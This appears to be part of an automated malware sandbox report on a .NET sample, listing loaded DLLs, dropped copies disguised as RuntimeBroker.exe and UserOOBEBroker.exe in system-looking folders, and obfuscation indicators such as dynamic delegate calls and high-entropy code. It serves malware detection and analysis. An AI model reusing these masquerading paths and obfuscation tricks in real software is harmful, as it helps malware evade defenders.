                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: mscoree.dll
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: version.dll
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: wldp.dll
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: profapi.dll
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: sspicli.dll
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: ktmw32.dll
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: rasapi32.dll
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: rasman.dll
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: rtutils.dll
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: mswsock.dll
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: winhttp.dll
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: iphlpapi.dll
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: dhcpcsvc6.dll
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: dhcpcsvc.dll
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: dnsapi.dll
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: winnsi.dll
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: rasadhlp.dll
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: fwpuclnt.dll
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: wbemcomn.dll
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: amsi.dll
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: userenv.dll
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: edputil.dll
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: dwrite.dll
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: winmm.dll
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: winmmbase.dll
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: mmdevapi.dll
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: devobj.dll
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: ksuser.dll
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: avrt.dll
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: audioses.dll
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: powrprof.dll
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: umpdc.dll
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: msacm32.dll
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: midimap.dll
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: windowscodecs.dll
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: ntmarta.dll
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: dpapi.dll
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeSection loaded: mscoree.dll
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeSection loaded: apphelp.dll
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeSection loaded: version.dll
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeSection loaded: wldp.dll
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeSection loaded: profapi.dll
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                              Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                              Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: version.dll
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: wldp.dll
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: profapi.dll
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: version.dll
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: wldp.dll
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: profapi.dll
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: sspicli.dll
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeSection loaded: mscoree.dll
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeSection loaded: version.dll
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeSection loaded: wldp.dll
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeSection loaded: profapi.dll
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeSection loaded: sspicli.dll
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeSection loaded: mscoree.dll
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeSection loaded: version.dll
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeSection loaded: wldp.dll
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeSection loaded: profapi.dll
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeSection loaded: sspicli.dll
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeSection loaded: mscoree.dll
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeSection loaded: version.dll
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeDirectory created: C:\Program Files\Windows Security\RuntimeBroker.exeJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeDirectory created: C:\Program Files\Windows Security\9e8d7a4ca61bd9Jump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeDirectory created: C:\Program Files\Internet Explorer\SIGNUP\RuntimeBroker.exeJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeDirectory created: C:\Program Files\Internet Explorer\SIGNUP\9e8d7a4ca61bd9Jump to behavior
                              Source: U1jaLbTw1f.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                              Source: U1jaLbTw1f.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                              Source: U1jaLbTw1f.exeStatic file information: File size 1914880 > 1048576
                              Source: U1jaLbTw1f.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1d3000
                              Source: U1jaLbTw1f.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                              Data Obfuscation

                              barindex
                              .NET source code contains method to dynamically call methods (often used by packers)
                              Source: U1jaLbTw1f.exe, MsXXArKsWAhV0MT7wxJ.cs.Net Code: Type.GetTypeFromHandle(I2CmRPdGiAu5f7OGMsV.Yi2Bu3Im5jv(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(I2CmRPdGiAu5f7OGMsV.Yi2Bu3Im5jv(16777245)),Type.GetTypeFromHandle(I2CmRPdGiAu5f7OGMsV.Yi2Bu3Im5jv(16777259))})
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeCode function: 0_2_00007FFD9B775394 push ds; ret 0_2_00007FFD9B775397
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeCode function: 0_2_00007FFD9B774B4F pushad ; retf 0_2_00007FFD9B774B55
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeCode function: 0_2_00007FFD9B7700BD pushad ; iretd 0_2_00007FFD9B7700C1
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeCode function: 0_2_00007FFD9B8D3033 push ebx; retn 0009h0_2_00007FFD9B8D3034
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeCode function: 0_2_00007FFD9BB6DF45 push edi; ret 0_2_00007FFD9BB6DF46
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeCode function: 0_2_00007FFD9BB67F4E push ss; ret 0_2_00007FFD9BB67F5D
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeCode function: 0_2_00007FFD9BB662C5 push ebp; ret 0_2_00007FFD9BB662C8
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeCode function: 0_2_00007FFD9BB6DE82 push esi; ret 0_2_00007FFD9BB6DE83
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeCode function: 0_2_00007FFD9BB6E52F push edi; ret 0_2_00007FFD9BB6E530
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeCode function: 0_2_00007FFD9BB6E504 push eax; ret 0_2_00007FFD9BB6E505
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeCode function: 15_2_00007FFD9B775394 push ds; ret 15_2_00007FFD9B775397
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeCode function: 15_2_00007FFD9B774B4F pushad ; retf 15_2_00007FFD9B774B55
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeCode function: 15_2_00007FFD9B7700BD pushad ; iretd 15_2_00007FFD9B7700C1
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeCode function: 15_2_00007FFD9B78734F push es; retf 15_2_00007FFD9B787357
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeCode function: 15_2_00007FFD9B789A06 push esi; ret 15_2_00007FFD9B789A09
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeCode function: 15_2_00007FFD9B789207 push ebp; retf 15_2_00007FFD9B78920A
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeCode function: 15_2_00007FFD9B787206 push ss; retf 15_2_00007FFD9B787207
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeCode function: 15_2_00007FFD9B7A5B99 push E812CF7Eh; ret 15_2_00007FFD9B7A5BA0
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeCode function: 18_2_00007FFD9B785394 push ds; ret 18_2_00007FFD9B785397
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeCode function: 18_2_00007FFD9B784B4F pushad ; retf 18_2_00007FFD9B784B55
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeCode function: 18_2_00007FFD9B7800BD pushad ; iretd 18_2_00007FFD9B7800C1
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeCode function: 20_2_00007FFD9B775394 push ds; ret 20_2_00007FFD9B775397
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeCode function: 20_2_00007FFD9B774B4F pushad ; retf 20_2_00007FFD9B774B55
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeCode function: 20_2_00007FFD9B7700BD pushad ; iretd 20_2_00007FFD9B7700C1
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeCode function: 20_2_00007FFD9B7A5B99 push E812EA7Eh; ret 20_2_00007FFD9B7A5BA0
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeCode function: 20_2_00007FFD9B78734F push es; retf 20_2_00007FFD9B787357
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeCode function: 20_2_00007FFD9B789A06 push esi; ret 20_2_00007FFD9B789A09
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeCode function: 20_2_00007FFD9B789207 push ebp; retf 20_2_00007FFD9B78920A
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeCode function: 20_2_00007FFD9B787206 push ss; retf 20_2_00007FFD9B787207
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeCode function: 22_2_00007FFD9B785394 push ds; ret 22_2_00007FFD9B785397
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeCode function: 22_2_00007FFD9B784B4F pushad ; retf 22_2_00007FFD9B784B55
                              Source: U1jaLbTw1f.exeStatic PE information: section name: .text entropy: 7.537640943300724
                              Source: mGDcgYSpPaqkzVyIrStmzarQirIs.exe.0.drStatic PE information: section name: .text entropy: 7.537640943300724
                              Source: RuntimeBroker.exe.0.drStatic PE information: section name: .text entropy: 7.537640943300724
                              Source: RuntimeBroker.exe0.0.drStatic PE information: section name: .text entropy: 7.537640943300724
                              Source: UserOOBEBroker.exe.0.drStatic PE information: section name: .text entropy: 7.537640943300724
                              Source: U1jaLbTw1f.exe, iut70bYiTMDalyoebjT.csHigh entropy of concatenated method names: 'Rrr', 'y1x', 'AvRV2naPF5l', 'fChV2I6lGIG', 't8mbFTVrdoubjKmsL3HC', 'HQFgJ6Vrv9df9uMNt9mI', 'nOhI58VrzKQTkCikCuyF', 'Q7scXbVeRLTQmlRThh8v', 'TmtpYfVeVDiBYgo6HUDH', 'gsJEe0VeBpsAR63ebtMc'
                              Source: U1jaLbTw1f.exe, AFNojwuCrDTDwTingSm.csHigh entropy of concatenated method names: 'q64', 'P9X', 'MhoV7GU24DC', 'vmethod_0', 'pyFV2AYn9o2', 'imethod_0', 'ly2xKEVl008kGd1HMocT', 'krpTgJVlfiHJ33OgucNW', 'i1Gt19VlQtK9r3KB4YtW', 'nlYdAbVlxRkRSbd1cwbB'
                              Source: U1jaLbTw1f.exe, acJarsOlF2WIbtMuHNA.csHigh entropy of concatenated method names: 'ziMOoiWsQM', 'hBOO8YhBVQ', 'o8eOJRu7wQ', 'md4OqwWpkB', 'Dispose', 'j30UZqV1XKHxNHshEL1B', 'URCkENV1bcZjVWIAqlQw', 'uqsHWhV1spZ2WwGZUdEE', 'CkHIk0V1PKBIARoWhEur', 'NbVgu3V1STjT8RnX2fyB'
                              Source: U1jaLbTw1f.exe, Udc6u1avTUon6pkSYhy.csHigh entropy of concatenated method names: 'N16MRrXV3d', 'ct5MVARdAp', 'zIKMBGx7t1', 'gJNM9unTiO', 'KD4M7okYSr', 'IwhMuEoxWB', 'hrBlQyVf18kYEbK4EtnG', 'f0BCZAVfdDSUw5Ct4Srx', 'moICZEVfvIkRxvK17lhc', 'hKq66PVfzNIDdSTSZ2Dh'
                              Source: U1jaLbTw1f.exe, Pk2XkpukQEow41EpfM9.csHigh entropy of concatenated method names: 'H8PuxgP86V', 'ifygiGVhVHwx51HixDcH', 'M1VEGdVlz0gHm3AeFy1m', 'fH38fHVhRqZYKOVP0p3R', 'em7hRJVhBsm1KNtuFVhF', 'irIWYxVh9wFJulf3P7hd', 'U1J', 'P9X', 'fU3V7XOvit9', 'VLrV7bxI3dh'
                              Source: U1jaLbTw1f.exe, ayl78cTrx1Pd9fFNiGC.csHigh entropy of concatenated method names: 'zVaTOHEwkP', 'y8CTKDCpsy', 'hjYivWV8uZTXhbn5N2b1', 'z9XNcXV89bJT6d6x7TSf', 'GZV6RiV87OJnsmhp1DVc', 'BQcVE9V8AeTXcXXwbM0v', 'rSlTkG2ywa', 'coeTwOQFE6', 'MEKT0BiMmZ', 'BlITf84R5x'
                              Source: U1jaLbTw1f.exe, CcXq06B6L4HPUllfYkv.csHigh entropy of concatenated method names: 'cYT9TaB65O', 'mXvBtAVavCxiVFn9uP9u', 'hVQRmMVazjbkhOfabJBx', 'ecfXdwVMRuGOLOR04uC3', 'IFR7VRVa15CySCERHSAd', 'o7HomNVadUqTHSo4jhM6', 'tKcsIuVMVoW5k5WS4tGJ', 'FAA9RrEfeA', 'Fg69BvIGaa', 'rs599T0732'
                              Source: U1jaLbTw1f.exe, GXQjxs2U0UoxPAMIK8S.csHigh entropy of concatenated method names: 'rwk2MnfVlk', 'GxH2LW2NRg', 'Nm72lh95uS', 'JVY2hng6a4', 'y1w2oOJi0B', 'EGT28Wq6h7', 'qEK8TrV8DRD4jmd2l8G0', 'JQd4v5V85XxYu96J7VnK', 'juw6geV8c4DCtGgCPeUM', 'NHGNUfV8OCYbWMt3846P'
                              Source: U1jaLbTw1f.exe, TNLun8YX24S7XRASLHn.csHigh entropy of concatenated method names: 'PtHxlKVen0nWVfAm4s4I', 'f0jHBJVeIyrc9qEKRRhs', 'mNwhq5VeHG7FO6dkMZP9', 'DZVoM1VemPIiParrfpWi', 'Avi3qiVeYUJkUga2kOY5', 'method_0', 'method_1', 'bS8Ysp0lTf', 'ksLYPXLIPL', 'aG4YSUmnNc'
                              Source: U1jaLbTw1f.exe, Icf3QmE5ZfZkuKP1alT.csHigh entropy of concatenated method names: 'DhyEOq3eYI', 'qt8EKdsBt1', 'lyZE14CBhO', 'xvsm0nV0FRbf9wYiKAUu', 'rK2Kd2V02tAo0sgAHD6n', 'Bc1lV5V0WTu2As1aufIj', 'KmQVxbV0iRoBWdqRcYFh', 'Aym3iTV0pH7ijWDag6wd', 'U64XqVV0tEpcSaku5ofZ'
                              Source: U1jaLbTw1f.exe, xcLWoX7EVIargnDbsZb.csHigh entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'of1V29ur2CM', 'zUmV7V8uNE0', 'xhD77mVLZ1kpuDYTRndt', 'Kqs28DVLE86ZScvbSnS7', 'NbmsrJVL3Zgdy2xvw4uM'
                              Source: U1jaLbTw1f.exe, Cg8b4XqJekGh25BK8Zi.csHigh entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'JVVelMVDLXS6Gylb8C1X', 'qPb7kxVDajpI6KDxXgDb', 'QC0sLHVDMNq7edAH4qYV'
                              Source: U1jaLbTw1f.exe, ctqjql3lyVvM2EQ018l.csHigh entropy of concatenated method names: 'method_0', 'sUy3oUkmRn', 'DVL38rVR65', 'IRd3JchWNj', 'k2Z3q7Ghyk', 'VCc3jgJl4f', 'wer3yHkvD3', 'noHhYwV0ELbWMCkki0ZG', 'rfK1UWV03AXvFukKAWaO', 'rgMq0PV0UQxA0PFrGhMN'
                              Source: U1jaLbTw1f.exe, b3sZjC2nrkR770233O8.csHigh entropy of concatenated method names: 'JdA2Hi9Cst', 'hmJdFwV8CYPyctZFKcFZ', 'qDFPgdV84mWVWREjSrKc', 'DSFXmLV8rX9sNpZIId2e', 'hn8vefV8eocuUrr4QikY', 'bEmFI9V8kFnZarEphWOJ', 'pnqfI8V8jxNQoWuLtEmE', 'IgyBbGV8yx0CP33MQfZx', 'UXgwWvV8w0W2two8WojQ'
                              Source: U1jaLbTw1f.exe, SipUOlaDYZt9eI4S6hl.csHigh entropy of concatenated method names: 'DRsacFRig5', 'IasaOxqsPU', 'LOLaKGATqp', 'clqa1oYoAF', 'XpradBUosS', 'cVXwx5VfNtr5qkDBowqO', 'nLuqxDVfx6tr0vKeexFk', 'hB2KvXVf6GD3ZyIPqn5v', 'rG4eroVfDty6wy229hbW', 'Be2THRVf5dogtRSIFXvh'
                              Source: U1jaLbTw1f.exe, iUjSlNmO6NRPP4TVvCM.csHigh entropy of concatenated method names: 'w52', 'o38', 'vmethod_0', 'CCem1KuJPl', 'NiHV2PWVVQ6', 'fH1ZdYVrqbUbrtAugHPD', 'mHlFhWVr8R164NLly2tF', 'JIYfUJVrJ2Wt5GNeU4QQ', 'IBLkPQVrjg8Nl02OeQ7A', 'qDyfUjVryQoQdJCL7xIn'
                              Source: U1jaLbTw1f.exe, Ic3O0VVPgGUfeNVsY7L.csHigh entropy of concatenated method names: 'RTM', 'KZ3', 'H7p', 'eeS', 'imethod_0', 'XbG', 'oiVVTzcpVPL', 'zUmV7V8uNE0', 'NPS1luVUSpG5QdICgcQN', 'eTYo09VUmCTbFgQtcgxe'
                              Source: U1jaLbTw1f.exe, DFEyQnmk2HY3Rdp1K7b.csHigh entropy of concatenated method names: 'pTlm05ojR4', 'xJSmfBDBqj', 'yMwmQoJvli', 'pL2gKQVrY0wNIKjveGsG', 'dME5oaVrSJZNVsAjv12H', 'a1BVypVrmULi1QsbwAfH', 'yWaYcnVrnCXWNq4QwYUw', 'Fg8vX8VrI7JxX0TxvT1L', 'ExWSMUVrHWpUXC7MddQA'
                              Source: U1jaLbTw1f.exe, mU820BArCm1Oxd9raT4.csHigh entropy of concatenated method names: 'mA7AOsErW3', 'KtiAKYmo57', 'FlsA1H007M', 'GghI6hVoRfvm22giV1rM', 'J34wUFVoVbSs8HKH6Ole', 'x6ThwwVhvn2lDtgdC2aF', 'oPwK3gVhzr8040ZwGVda', 'GXcAkoJq9F', 'bErAw9us90', 'wjPA0pOkJr'
                              Source: U1jaLbTw1f.exe, CWNh41AZOrVBXARGPYM.csHigh entropy of concatenated method names: 'gmjAl43IqK', 'gxSWGHVhq2vYgZTf4SWb', 'QQP5TNVh8jO0PXQ4NOMe', 'xNR0JIVhJNmoGdsUQbGX', 't1pjdaVhj608XxAaa53F', 'E94', 'P9X', 'vmethod_0', 'hb5V7mKG7eY', 'huvV2WuAPYa'
                              Source: U1jaLbTw1f.exe, uWxfjNYuTesi7mOqKCD.csHigh entropy of concatenated method names: 'method_0', 'method_1', 'K47', 'gbXYTCOxp2', 'vmethod_0', 'jXRY2dLSlI', 'rlSV2YpnObi', 'mYRsJ5Vr5r4NJg6FLS5v', 'iNAFvpVrNEstho1lIOLK', 'UZuLDHVrDnrc2tyG5CPG'
